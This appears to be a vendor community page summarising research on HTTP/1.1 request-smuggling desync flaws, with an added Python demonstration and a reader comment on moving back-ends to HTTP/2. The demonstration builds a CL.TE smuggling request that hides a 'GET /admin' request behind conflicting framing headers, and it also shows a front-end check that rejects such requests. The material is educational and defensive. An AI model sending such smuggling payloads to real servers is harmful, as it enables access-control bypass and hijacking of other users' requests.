HTTP/1.1’s Limitations - and How F5 Has You Covered
Summary
In his latest research, HTTP/1.1 Must Die, James Kettle of PortSwigger demonstrates how small parsing discrepancies between front-end and back-end servers can create “desync” vulnerabilitie...
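To make the "parsing discrepancy" concrete, here is an added worked example (written for this page, not code from the article, F5, or PortSwigger). Two toy HTTP/1.1 parsers read the same byte stream: one gives Content-Length priority (as a front-end might), the other gives Transfer-Encoding priority (as a back-end might). The request bytes, the `example.test` host name, and the `/admin` path are constructed for the demonstration; the `is_ambiguous` check at the end is the simple front-end guard RFC 9112 permits (reject any request carrying both framing headers).

```python
"""Added illustration of a CL.TE request-smuggling desync: the same bytes,
split into different request sequences by two HTTP/1.1 parsers.
Toy code for this page; not F5 or PortSwigger code."""


def _split_headers(buf):
    """Parse the request head at buf[0]. Returns (request_line, headers, body_start)
    or None when the head is incomplete (no blank line yet)."""
    end = buf.find(b"\r\n\r\n")
    if end == -1:
        return None
    head = buf[:end].split(b"\r\n")
    headers = {}
    for line in head[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return head[0], headers, end + 4


def _read_chunked(buf, pos):
    """Consume a chunked body starting at pos; returns (body, position after body).
    Chunk extensions are ignored and trailers are not supported (toy parser)."""
    body = b""
    while True:
        line_end = buf.index(b"\r\n", pos)
        size = int(buf[pos:line_end].split(b";")[0], 16)
        pos = line_end + 2
        if size == 0:
            return body, pos + 2          # skip the CRLF that ends the last chunk
        body += buf[pos:pos + size]
        pos += size + 2                   # chunk data plus its trailing CRLF


def parse_stream(buf, prefer):
    """Split a byte stream into (request_line, body) pairs.
    prefer == "cl": Content-Length wins when both headers are present.
    prefer == "te": Transfer-Encoding wins (what RFC 9112 actually requires)."""
    requests, pos = [], 0
    while pos < len(buf):
        parsed = _split_headers(buf[pos:])
        if parsed is None:
            # Bytes that do not yet form a full request stay buffered on the
            # connection and are prepended to whatever arrives next.
            requests.append((b"INCOMPLETE", buf[pos:]))
            break
        request_line, headers, body_start = parsed
        body_start += pos
        has_te = headers.get(b"transfer-encoding", b"").lower() == b"chunked"
        has_cl = b"content-length" in headers
        if has_te and (prefer == "te" or not has_cl):
            body, pos = _read_chunked(buf, body_start)
        elif has_cl:
            length = int(headers[b"content-length"])
            body = buf[body_start:body_start + length]
            pos = body_start + length
        else:
            body, pos = b"", body_start
        requests.append((request_line, body))
    return requests


def is_ambiguous(raw):
    """Front-end guard: True when a request carries both framing headers.
    RFC 9112 allows a server to reject such requests outright."""
    parsed = _split_headers(raw)
    if parsed is None:
        return False
    _, headers, _ = parsed
    return b"transfer-encoding" in headers and b"content-length" in headers


def build_cl_te_request(smuggled):
    """Constructed attacker request: Content-Length covers a zero-length chunk
    plus the smuggled prefix; a TE-first parser stops after the zero chunk."""
    body = b"0\r\n\r\n" + smuggled
    return (b"POST / HTTP/1.1\r\nHost: example.test\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n"
            b"Transfer-Encoding: chunked\r\n\r\n" + body)


# Constructed sample traffic (hypothetical host and path).
SMUGGLED = b"GET /admin HTTP/1.1\r\nX-Ignore: "
VICTIM = b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"
STREAM = build_cl_te_request(SMUGGLED) + VICTIM


def front_end_view():
    """A Content-Length-first front-end sees two ordinary requests."""
    return parse_stream(STREAM, "cl")


def back_end_view():
    """A Transfer-Encoding-first back-end sees the victim's request swallowed
    into a smuggled GET /admin via the dangling X-Ignore header."""
    return parse_stream(STREAM, "te")


if __name__ == "__main__":
    for label, view in (("front-end", front_end_view()), ("back-end", back_end_view())):
        print(label, [line for line, _ in view])
    print("ambiguous:", is_ambiguous(build_cl_te_request(SMUGGLED)))
```

Run it and the front-end reports `POST /` followed by `GET /`, while the back-end reports `POST /` followed by `GET /admin`: the victim's request line has been absorbed as the value of `X-Ignore`. The `is_ambiguous` check would have refused the attacker's request at the front-end; the more robust fix the comment below discusses, speaking HTTP/2 to the back-end, removes the CL/TE framing question altogether.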
Updated Aug 21, 2025
Version 2.0
Authors: Hen_Golubenko (Employee, joined July 14, 2025) and ronnygreenberg (Employee, joined August 14, 2025)
Juergen_Mang (MVP), Sep 01, 2025:
Great article! I read this research on my holiday and planned to write something about it on DevCentral, but you were faster.
As I understand the research:
- The only real solution is to use only HTTP/2 on the server side; everything else is patchwork.
- HTTP/1 on the client side is not so dangerous.
- OneConnect should be disabled.
I am curious to know who uses HTTP/2 only on the server side in production setups? Most F5 deployments I see don't use HTTP/2 at all.
Edit: What is the best way to enforce HTTP/2 server-side connections only?